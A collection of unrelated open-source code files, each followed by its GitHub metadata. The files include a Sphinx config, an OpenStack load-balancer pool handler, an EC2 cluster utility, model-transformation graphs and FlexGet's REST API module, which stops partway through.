html_short_title = 'GeoMesa'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
# note: shown in our custom footer
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# note: shown in our custom footer
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# note: shown in our custom footer
html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'GeoMesadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GeoMesa.tex', u'GeoMesa Documentation',
u'GeoMesa', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = True
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'geomesa', u'GeoMesa Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GeoMesa', u'GeoMesa Documentation',
author, 'GeoMesa', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# strip out the leading `$` in bash and `>` accumulo examples
copybutton_prompt_text = "[$>] "
copybutton_prompt_is_regexp = True
# but keep all lines, as we also have a lot of scala/java examples that don't have prompts
copybutton_only_copy_prompt_lines = False
|
{
"content_hash": "053ada6a05bd4a62a8b8e310ab77a95e",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 211,
"avg_line_length": 34.049180327868854,
"alnum_prop": 0.7115230300112342,
"repo_name": "jrs53/geomesa",
"id": "79ea0f879e13ce6fa7f1c6f84bfb7c0be58cda1b",
"size": "12882",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "docs/common.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2900"
},
{
"name": "Java",
"bytes": "264723"
},
{
"name": "JavaScript",
"bytes": "140"
},
{
"name": "Python",
"bytes": "33084"
},
{
"name": "R",
"bytes": "2716"
},
{
"name": "Scala",
"bytes": "8997327"
},
{
"name": "Scheme",
"bytes": "3143"
},
{
"name": "Shell",
"bytes": "114662"
}
],
"symlink_target": ""
}
|
import copy
import logging
from a10_neutron_lbaas.acos import openstack_mappings
from a10_neutron_lbaas.v2 import handler_base_v2
from a10_neutron_lbaas.v2 import handler_persist
from a10_neutron_lbaas.v2 import v2_context as a10
import acos_client.errors as acos_errors
LOG = logging.getLogger(__name__)
class PoolHandler(handler_base_v2.HandlerBaseV2):
def _set(self, set_method, c, context, pool, old_pool=None):
self._update_session_persistence(old_pool, pool, c, context)
args = {'service_group': self.meta(pool, 'service_group', {})}
os_name = pool.name
conf_templates = c.device_cfg.get('templates')
if conf_templates:
service_group_templates = conf_templates.get("service-group", None)
else:
service_group_templates = None
set_method(
self._meta_name(pool),
protocol=openstack_mappings.service_group_protocol(c, pool.protocol),
lb_method=openstack_mappings.service_group_lb_method(c, pool.lb_algorithm),
service_group_templates=service_group_templates,
config_defaults=self._get_config_defaults(c, os_name),
axapi_args=args)
# session persistence might need a vport update
if pool.listener:
# neutron-lbaas object graphs aren't fully populated ...
pool.listener.default_pool_id = pool.listener.default_pool_id or pool.id
# ... and don't update object references from ids
pool.listener.default_pool = pool.listener.default_pool or pool
self.a10_driver.listener._update(c, context, pool.listener)
def _create(self, c, context, pool):
try:
self._set(c.client.slb.service_group.create,
c, context, pool)
except acos_errors.Exists:
pass
def create(self, context, pool):
with a10.A10WriteStatusContext(self, context, pool) as c:
try:
self._set(c.client.slb.service_group.create,
c, context, pool)
except acos_errors.Exists:
pass
def update(self, context, old_pool, pool):
with a10.A10WriteStatusContext(self, context, pool) as c:
self._set(c.client.slb.service_group.update,
c, context, pool, old_pool)
def delete(self, context, pool):
with a10.A10DeleteContext(self, context, pool) as c:
debug_fmt = "handler_pool.delete(): removing member {0} from pool {1}"
for member in pool.members:
LOG.debug(debug_fmt.format(member, member.pool_id))
self.a10_driver.member._delete(c, context, member)
LOG.debug("handler_pool.delete(): Checking pool health monitor...")
if pool.healthmonitor:
# The pool.healthmonitor we get doesn't have a pool
# Make a new one with the hm as the root
hm = copy.copy(pool.healthmonitor)
hm.pool = copy.copy(pool)
hm.pool.healthmonitor = None
LOG.debug("handler_pool.delete(): HM: %s" % hm)
self.a10_driver.hm._delete(c, context, hm)
try:
c.client.slb.service_group.delete(self._meta_name(pool))
except (acos_errors.NotFound, acos_errors.NoSuchServiceGroup):
pass
handler_persist.PersistHandler(
c, context, pool, self._meta_name(pool)).delete()
def _update_session_persistence(self, old_pool, pool, c, context):
# didn't exist, does exist, create
if not old_pool or (not old_pool.session_persistence and pool.session_persistence):
p = handler_persist.PersistHandler(c, context, pool, old_pool)
p.create()
return
# existed, change, delete and recreate
if (old_pool.session_persistence and pool.session_persistence and
old_pool.session_persistence.type != pool.session_persistence.type):
p = handler_persist.PersistHandler(c, context, old_pool)
p.delete()
p = handler_persist.PersistHandler(c, context, pool)
p.create()
return
# didn't exist, does exist now, create
if old_pool.session_persistence and not pool.session_persistence:
p = handler_persist.PersistHandler(c, context, pool)
p.create()
return
# didn't exist, doesn't exist
# did exist, does exist, didn't change
return
def stats(self, context, pool):
result = {"stats": {}, "members": {}}
with a10.A10Context(self, context, pool) as c:
name = pool.id
if name is not None:
stats = c.client.slb.service_group.stats(name)
result["stats"] = stats.get("stats", {})
result["members"] = stats.get("members", {})
return result
def _get_expressions(self, c):
rv = {}
rv = c.a10_driver.config.get_service_group_expressions()
return rv
|
{
"content_hash": "a97b5523ed3bac41e8ba3ce290df9bee",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 91,
"avg_line_length": 39.9140625,
"alnum_prop": 0.5944411822274418,
"repo_name": "hthompson6/a10-neutron-lbaas",
"id": "823a1c0061f074dbdcbb1bfba5455da2c0675f29",
"size": "5744",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10_neutron_lbaas/v2/handler_pool.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1083"
},
{
"name": "Python",
"bytes": "543752"
},
{
"name": "Shell",
"bytes": "6672"
}
],
"symlink_target": ""
}
|
from info import __doc__
from kdtree import *
from ckdtree import *
from qhull import *
__all__ = filter(lambda s:not s.startswith('_'),dir())
__all__ += ['distance']
import distance
from numpy.testing import Tester
test = Tester().test
|
{
"content_hash": "03e14dd26a1da84362b41373df24f624",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 54,
"avg_line_length": 21.727272727272727,
"alnum_prop": 0.6903765690376569,
"repo_name": "scipy/scipy-svn",
"id": "a9b15fa976afde58f9bb7dfcb619aaf86e7eb9c6",
"size": "266",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scipy/spatial/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8532454"
},
{
"name": "C++",
"bytes": "6602032"
},
{
"name": "FORTRAN",
"bytes": "5895476"
},
{
"name": "Objective-C",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "4753723"
},
{
"name": "Shell",
"bytes": "1742"
}
],
"symlink_target": ""
}
|
from rdflib import Literal
from classes import ldp
from namespaces import dcterms, iana, ore, rdf
# alias the RDFlib Namespace
ns = ore
class Proxy(ldp.Resource):
def __init__(self, position, proxy_for, proxy_in):
super(Proxy, self).__init__()
self.title = 'Proxy for {0} in {1}'.format(position, proxy_in.title)
self.prev = None
self.next = None
self.proxy_for = proxy_for
self.proxy_in = proxy_in
def graph(self):
graph = super(Proxy, self).graph()
graph.add((self.uri, rdf.type, ore.Proxy))
graph.add((self.uri, dcterms.title, Literal(self.title)))
graph.add((self.uri, ore.proxyFor, self.proxy_for.uri))
graph.add((self.uri, ore.proxyIn, self.proxy_in.uri))
if self.prev is not None:
graph.add((self.uri, iana.prev, self.prev.uri))
if self.next is not None:
graph.add((self.uri, iana.next, self.next.uri))
return graph
# create proxy object by PUTting object graph
def create_object(self, repository, **kwargs):
uri='/'.join([p.strip('/') for p in (self.proxy_for.uri, self.proxy_in.uuid)])
super(Proxy, self).create_object(repository, uri=uri, **kwargs)
|
{
"content_hash": "f7ca362176c074fd1293a2b69f68b574",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 86,
"avg_line_length": 37.333333333333336,
"alnum_prop": 0.6209415584415584,
"repo_name": "peichman-umd/newspaper-batchload",
"id": "2bf671cc606c8791f84e061a47c1f58e903491b1",
"size": "1232",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "classes/ore.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "115680"
},
{
"name": "Shell",
"bytes": "838"
}
],
"symlink_target": ""
}
|
import json
import sys
from setuptools import setup
try:
from jupyterpip import cmdclass
except:
import pip
import importlib
pip.main(["install", "jupyter-pip"])
cmdclass = importlib.import_module("jupyterpip").cmdclass
with open("setup.json") as f:
setup_data = json.load(f)
if sys.version_info[0] < 3:
# insidious! http://bugs.python.org/issue13943
setup_data["packages"] = [s.encode("utf-8")
for s in setup_data["packages"]]
with open("README.rst") as f:
setup_data.update(
long_description=f.read()
)
setup_data.update(
cmdclass=cmdclass(
path="{}/static/{}".format(
setup_data["packages"][0],
setup_data["name"],
)
)
)
setup(**setup_data)
|
{
"content_hash": "7612d1e4d48832e6a31f6acecfe6e7ac",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 62,
"avg_line_length": 20,
"alnum_prop": 0.5974358974358974,
"repo_name": "bollwyvl/nb-mermaid",
"id": "11cfe1801e65bf82e92d52771a9fdeb59cadd3af",
"size": "826",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "50"
},
{
"name": "CoffeeScript",
"bytes": "1378"
},
{
"name": "HTML",
"bytes": "3370"
},
{
"name": "Python",
"bytes": "1143"
},
{
"name": "Shell",
"bytes": "126"
}
],
"symlink_target": ""
}
|
from measurements import webrtc
from telemetry import test
class WebRTC(test.Test):
"""Obtains WebRTC metrics for local video playback."""
test = webrtc.WebRTC
page_set = 'page_sets/webrtc_cases.json'
|
{
"content_hash": "465703b2b6b6230a17350d35ed91925b",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 56,
"avg_line_length": 26.125,
"alnum_prop": 0.7511961722488039,
"repo_name": "anirudhSK/chromium",
"id": "2f1522ea96dadcafe6b877260f8bad51fc510c76",
"size": "371",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/perf/benchmarks/webrtc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "853"
},
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "52960"
},
{
"name": "Awk",
"bytes": "8660"
},
{
"name": "C",
"bytes": "42502191"
},
{
"name": "C#",
"bytes": "1132"
},
{
"name": "C++",
"bytes": "201859263"
},
{
"name": "CSS",
"bytes": "946557"
},
{
"name": "DOT",
"bytes": "2984"
},
{
"name": "Java",
"bytes": "5687122"
},
{
"name": "JavaScript",
"bytes": "22163714"
},
{
"name": "M",
"bytes": "2190"
},
{
"name": "Matlab",
"bytes": "2496"
},
{
"name": "Objective-C",
"bytes": "7670589"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "Perl",
"bytes": "672770"
},
{
"name": "Python",
"bytes": "10873885"
},
{
"name": "R",
"bytes": "262"
},
{
"name": "Shell",
"bytes": "1315894"
},
{
"name": "Tcl",
"bytes": "277091"
},
{
"name": "TypeScript",
"bytes": "1560024"
},
{
"name": "XSLT",
"bytes": "13493"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
}
|
"""The preprocess mediator."""
from plaso.containers import warnings
class PreprocessMediator(object):
"""Preprocess mediator."""
def __init__(self, storage_writer, knowledge_base):
"""Initializes a preprocess mediator.
Args:
storage_writer (StorageWriter): storage writer, to store preprocessing
information in.
knowledge_base (KnowledgeBase): knowledge base, to fill with
preprocessing information.
"""
super(PreprocessMediator, self).__init__()
self._file_entry = None
self._knowledge_base = knowledge_base
self._storage_writer = storage_writer
@property
def knowledge_base(self):
"""KnowledgeBase: knowledge base."""
return self._knowledge_base
def ProducePreprocessingWarning(self, plugin_name, message):
"""Produces a preprocessing warning.
Args:
plugin_name (str): name of the preprocess plugin.
message (str): message of the warning.
"""
if self._storage_writer:
path_spec = None
if self._file_entry:
path_spec = self._file_entry.path_spec
warning = warnings.PreprocessingWarning(
message=message, path_spec=path_spec, plugin_name=plugin_name)
self._storage_writer.AddPreprocessingWarning(warning)
def SetFileEntry(self, file_entry):
"""Sets the active file entry.
Args:
file_entry (dfvfs.FileEntry): file entry.
"""
self._file_entry = file_entry
|
{
"content_hash": "1f4eb7aaf33fb8fa3782a2b20f7576f3",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 76,
"avg_line_length": 28.76,
"alnum_prop": 0.6731571627260083,
"repo_name": "kiddinn/plaso",
"id": "19c983f050d8dbd875bc9f068e661a62d3ffbe14",
"size": "1462",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plaso/preprocessors/mediator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1047"
},
{
"name": "Makefile",
"bytes": "68"
},
{
"name": "PowerShell",
"bytes": "9560"
},
{
"name": "Python",
"bytes": "4878625"
},
{
"name": "Ruby",
"bytes": "926"
},
{
"name": "Shell",
"bytes": "26453"
}
],
"symlink_target": ""
}
|
"""
Utility methods
"""
import os
import sys
from os.path import isfile, join
from optparse import OptionParser
class EC2Type:
def __init__(self, arch, ephemeral=1, has_nvme=False):
self.arch = arch
self.ephemeral = ephemeral
self.has_nvme = has_nvme
AMI_HELP_MSG = """PLEASE NOTE - If you have accepted the software terms for CentOS 7 and still get an error,
this could be due to CentOS releasing new images of CentOS 7. When this occurs, the old images
are no longer available to new users. If you think this is the case, go to the CentOS 7 product
page on AWS Marketplace at the URL below to find the latest AMI:
https://aws.amazon.com/marketplace/pp/B00O7WM7QW
On the product page, find the latest AMI ID for your EC2 region. This should be used to set the 'aws_ami'
property in your muchos.props. After setting the 'aws_ami' property, run the launch command again.
""" # noqa
instance_types = {
"c1.medium": EC2Type("pvm"),
"c1.xlarge": EC2Type("pvm", 4),
"c3.2xlarge": EC2Type("pvm", 2),
"c3.4xlarge": EC2Type("pvm", 2),
"c3.8xlarge": EC2Type("pvm", 2),
"c3.large": EC2Type("pvm", 2),
"c3.xlarge": EC2Type("pvm", 2),
"cc2.8xlarge": EC2Type("hvm", 4),
"cg1.4xlarge": EC2Type("hvm", 2),
"cr1.8xlarge": EC2Type("hvm", 2),
"hi1.4xlarge": EC2Type("pvm", 2),
"hs1.8xlarge": EC2Type("pvm", 24),
"i2.2xlarge": EC2Type("hvm", 2),
"i2.4xlarge": EC2Type("hvm", 4),
"i2.8xlarge": EC2Type("hvm", 8),
"i2.xlarge": EC2Type("hvm"),
"i3.large": EC2Type("hvm", 1, True),
"i3.xlarge": EC2Type("hvm", 1, True),
"i3.2xlarge": EC2Type("hvm", 1, True),
"i3.4xlarge": EC2Type("hvm", 2, True),
"m1.large": EC2Type("pvm", 2),
"m1.medium": EC2Type("pvm"),
"m1.small": EC2Type("pvm"),
"m1.xlarge": EC2Type("pvm", 4),
"m2.2xlarge": EC2Type("pvm", 1),
"m2.4xlarge": EC2Type("pvm", 2),
"m2.xlarge": EC2Type("pvm"),
"m3.2xlarge": EC2Type("hvm", 2),
"m3.large": EC2Type("hvm"),
"m3.medium": EC2Type("hvm"),
"m3.xlarge": EC2Type("hvm", 2),
"m5d.large": EC2Type("hvm", 1, True),
"m5d.xlarge": EC2Type("hvm", 1, True),
"m5d.2xlarge": EC2Type("hvm", 1, True),
"m5d.4xlarge": EC2Type("hvm", 2, True),
"m5d.12xlarge": EC2Type("hvm", 2, True),
"m5d.24xlarge": EC2Type("hvm", 4, True),
"r3.2xlarge": EC2Type("hvm", 1),
"r3.4xlarge": EC2Type("hvm", 1),
"r3.8xlarge": EC2Type("hvm", 2),
"r3.large": EC2Type("hvm", 1),
"r3.xlarge": EC2Type("hvm", 1),
"d2.xlarge": EC2Type("hvm", 3),
"d2.2xlarge": EC2Type("hvm", 6),
"d2.4xlarge": EC2Type("hvm", 12),
"d2.8xlarge": EC2Type("hvm", 24),
}
def verify_type(instance_type):
if instance_type not in instance_types:
print(
"ERROR - EC2 instance type '{}' is currently "
"not supported!".format(instance_type)
)
print("This is probably due to the instance type being EBS-only.")
print("Below is a list of supported instance types:")
for key in instance_types:
print(key)
sys.exit(1)
def get_arch(instance_type):
verify_type(instance_type)
return instance_types.get(instance_type).arch
def get_ephemeral_devices(instance_type):
verify_type(instance_type)
devices = []
ec2_type = instance_types.get(instance_type)
start = 0
if instance_type.startswith("m5d"):
start = 1
for i in range(start, ec2_type.ephemeral + start):
if ec2_type.has_nvme:
devices.append("/dev/nvme" + str(i) + "n1")
else:
devices.append("/dev/xvd" + chr(ord("b") + i))
return devices
def get_block_device_map(instance_type):
verify_type(instance_type)
bdm = [{"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": True}}]
ec2_type = instance_types.get(instance_type)
if not ec2_type.has_nvme:
for i in range(0, ec2_type.ephemeral):
device = {
"DeviceName": "/dev/xvd" + chr(ord("b") + i),
"VirtualName": "ephemeral" + str(i),
}
bdm.append(device)
return bdm
def parse_args(hosts_dir, input_args=None):
parser = OptionParser(
usage="muchos [options] <action>\n\n"
+ "where <action> can be:\n"
+ " launch Launch cluster in Azure or EC2\n"
+ " status Check status of Azure or EC2 cluster\n"
+ " setup Set up cluster\n"
+ " sync Sync ansible directory on cluster proxy node\n"
+ " config Print configuration for that cluster. "
"Requires '-p'. Use '-p all' for all config.\n"
+ " ssh SSH to cluster proxy node\n"
+ " kill Kills processes on cluster started by Muchos\n"
+ " wipe Wipes cluster data and kills processes\n"
+ " terminate Terminate EC2 cluster\n"
+ " cancel_shutdown Cancels automatic shutdown of EC2 cluster",
add_help_option=False,
)
parser.add_option(
"-c", "--cluster", dest="cluster", help="Specifies cluster"
)
parser.add_option(
"-p",
"--property",
dest="property",
help="Specifies property to print (if using 'config' action)"
". Set to 'all' to print every property",
)
parser.add_option(
"-h", "--help", action="help", help="Show this help message and exit"
)
if input_args:
(opts, args) = parser.parse_args(input_args)
else:
(opts, args) = parser.parse_args()
if len(args) == 0:
print("ERROR - You must specify on action")
return
action = args[0]
if action == "launch" and not opts.cluster:
print("ERROR - You must specify a cluster if using launch command")
return
clusters = [f for f in os.listdir(hosts_dir) if isfile(join(hosts_dir, f))]
if not opts.cluster:
if len(clusters) == 0:
print(
"ERROR - No clusters found in conf/hosts "
"or specified by --cluster option"
)
return
elif len(clusters) == 1:
opts.cluster = clusters[0]
else:
print(
"ERROR - Multiple clusters {0} found in conf/hosts/. "
"Please pick one using --cluster option".format(clusters)
)
return
if action == "config" and not opts.property:
print(
"ERROR - For config action, you must set -p to a property or 'all'"
)
return
return opts, action, args[1:]
|
{
"content_hash": "c42af1ddf30624948ebbdd5e9b8584da",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 108,
"avg_line_length": 33.039800995024876,
"alnum_prop": 0.5741605179942779,
"repo_name": "fluo-io/fluo-deploy",
"id": "158ea920892e840c940569ff51820bacd3c4899a",
"size": "7426",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/muchos/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "37941"
},
{
"name": "Shell",
"bytes": "7202"
}
],
"symlink_target": ""
}
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HUnitConnectCAE_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HUnitConnectCAE_ConnectedLHS
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HUnitConnectCAE_ConnectedLHS, self).__init__(name='HUnitConnectCAE_ConnectedLHS', num_nodes=0, edges=[])
# Add the edges
self.add_edges([])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """return True"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'HUnitConnectCAE_ConnectedLHS')
self["equations"] = []
# Set the node attributes
# match class Channel(Channel) node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """return True"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["mm__"] = """MT_pre__Channel"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'Channel')
# Add the edges
self.add_edges([
])
# define evaluation methods for each match class.
def eval_attr11(self, attr_value, this):
return True
# define evaluation methods for each match association.
def constraint(self, PreNode, graph):
return True
|
{
"content_hash": "8b7bc97e4358fe711ba6f72c0c57ec64",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 112,
"avg_line_length": 27.104166666666668,
"alnum_prop": 0.6825518831667948,
"repo_name": "levilucio/SyVOLT",
"id": "17c2123dac1c6271a2d0947bc806c9030444d407",
"size": "1301",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "RSS2ATOM/contracts/unit/HUnitConnectCAE_ConnectedLHS.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "166159"
},
{
"name": "Python",
"bytes": "34207588"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import json
import logging
import os
import re
from collections import deque
from functools import wraps
from flask import Flask, request, jsonify, make_response
from flask_compress import Compress
from flask_cors import CORS
from flask_restplus import Api as RestPlusAPI, Resource
from jsonschema import RefResolutionError
from werkzeug.http import generate_etag
from flexget import manager
from flexget.config_schema import process_config, format_checker
from flexget.utils.database import with_session
from flexget.webserver import User
from . import __path__
__version__ = '1.3.0'
log = logging.getLogger('api')
class APIClient(object):
"""
This is an client which can be used as a more pythonic interface to the rest api.
It skips http, and is only usable from within the running flexget process.
"""
def __init__(self):
self.app = api_app.test_client()
def __getattr__(self, item):
return APIEndpoint('/api/' + item, self.get_endpoint)
def get_endpoint(self, url, data=None, method=None):
if method is None:
method = 'POST' if data is not None else 'GET'
auth_header = dict(Authorization='Token %s' % api_key())
response = self.app.open(url, data=data, follow_redirects=True, method=method, headers=auth_header)
result = json.loads(response.get_data(as_text=True))
# TODO: Proper exceptions
if 200 > response.status_code >= 300:
raise Exception(result['error'])
return result
class APIEndpoint(object):
def __init__(self, endpoint, caller):
self.endpoint = endpoint
self.caller = caller
def __getattr__(self, item):
return self.__class__(self.endpoint + '/' + item, self.caller)
__getitem__ = __getattr__
def __call__(self, data=None, method=None):
return self.caller(self.endpoint, data=data, method=method)
def api_version(f):
""" Add the 'API-Version' header to all responses """
@wraps(f)
def wrapped(*args, **kwargs):
rv = f(*args, **kwargs)
rv.headers['API-Version'] = __version__
return rv
return wrapped
class APIResource(Resource):
"""All api resources should subclass this class."""
method_decorators = [with_session, api_version]
def __init__(self, api, *args, **kwargs):
self.manager = manager.manager
super(APIResource, self).__init__(api, *args, **kwargs)
class API(RestPlusAPI):
"""
Extends a flask restplus :class:`flask_restplus.Api` with:
- methods to make using json schemas easier
- methods to auto document and handle :class:`ApiError` responses
"""
def validate(self, model, schema_override=None, description=None):
"""
When a method is decorated with this, json data submitted to the endpoint will be validated with the given
`model`. This also auto-documents the expected model, as well as the possible :class:`ValidationError` response.
"""
def decorator(func):
@api.expect((model, description))
@api.response(ValidationError)
@wraps(func)
def wrapper(*args, **kwargs):
payload = request.json
try:
schema = schema_override if schema_override else model.__schema__
errors = process_config(config=payload, schema=schema, set_defaults=False)
if errors:
raise ValidationError(errors)
except RefResolutionError as e:
raise APIError(str(e))
return func(*args, **kwargs)
return wrapper
return decorator
def response(self, code_or_apierror, description='Success', model=None, **kwargs):
"""
Extends :meth:`flask_restplus.Api.response` to allow passing an :class:`ApiError` class instead of
response code. If an `ApiError` is used, the response code, and expected response model, is automatically
documented.
"""
try:
if issubclass(code_or_apierror, APIError):
description = code_or_apierror.description or description
return self.doc(
responses={code_or_apierror.status_code: (description, code_or_apierror.response_model)}, **kwargs)
except TypeError:
# If first argument isn't a class this happens
pass
return self.doc(responses={code_or_apierror: (description, model)}, **kwargs)
def pagination_parser(self, parser=None, sort_choices=None, default=None, add_sort=None):
"""
Return a standardized pagination parser, to be used for any endpoint that has pagination.
:param RequestParser parser: Can extend a given parser or create a new one
:param tuple sort_choices: A tuple of strings, to be used as server side attribute searches
:param str default: The default sort string, used `sort_choices[0]` if not given
:param bool add_sort: Add sort order choices without adding specific sort choices
:return: An api.parser() instance with pagination and sorting arguments.
"""
pagination = parser.copy() if parser else self.parser()
pagination.add_argument('page', type=int, default=1, help='Page number')
pagination.add_argument('per_page', type=int, default=50, help='Results per page')
if sort_choices or add_sort:
pagination.add_argument('order', choices=('desc', 'asc'), default='desc', help='Sorting order')
if sort_choices:
pagination.add_argument('sort_by', choices=sort_choices, default=default or sort_choices[0],
help='Sort by attribute')
return pagination
api_app = Flask(__name__, template_folder=os.path.join(__path__[0], 'templates'))
api_app.config['REMEMBER_COOKIE_NAME'] = 'flexget.token'
api_app.config['DEBUG'] = True
api_app.config['ERROR_404_HELP'] = False
api_app.url_map.strict_slashes = False
CORS(api_app, expose_headers='Link, Total-Count, Count, ETag')
Compress(api_app)
api = API(
api_app,
title='Flexget API v{}'.format(__version__),
version=__version__,
description='View and manage flexget core operations and plugins. Open each endpoint view for usage information.'
' Navigate to http://flexget.com/API for more details.',
format_checker=format_checker
)
base_message = {
'type': 'object',
'properties': {
'status_code': {'type': 'integer'},
'message': {'type': 'string'},
'status': {'type': 'string'}
},
'required': ['status_code', 'message', 'status']
}
base_message_schema = api.schema_model('base_message', base_message)
class APIError(Exception):
description = 'Server error'
status_code = 500
status = 'Error'
response_model = base_message_schema
def __init__(self, message=None, payload=None):
self.message = message
self.payload = payload
def to_dict(self):
rv = self.payload or {}
rv.update(status_code=self.status_code, message=self.message, status=self.status)
return rv
@classmethod
def schema(cls):
return cls.response_model.__schema__
class NotFoundError(APIError):
status_code = 404
description = 'Not found'
class Unauthorized(APIError):
status_code = 401
description = 'Unauthorized'
class BadRequest(APIError):
status_code = 400
description = 'Bad request'
class Conflict(APIError):
status_code = 409
description = 'Conflict'
class PreconditionFailed(APIError):
status_code = 412
description = 'Precondition failed'
class NotModified(APIError):
status_code = 304
description = 'not modified'
class ValidationError(APIError):
status_code = 422
description = 'Validation error'
response_model = api.schema_model('validation_error', {
'type': 'object',
'properties': {
'validation_errors': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'message': {'type': 'string', 'description': 'A human readable message explaining the error.'},
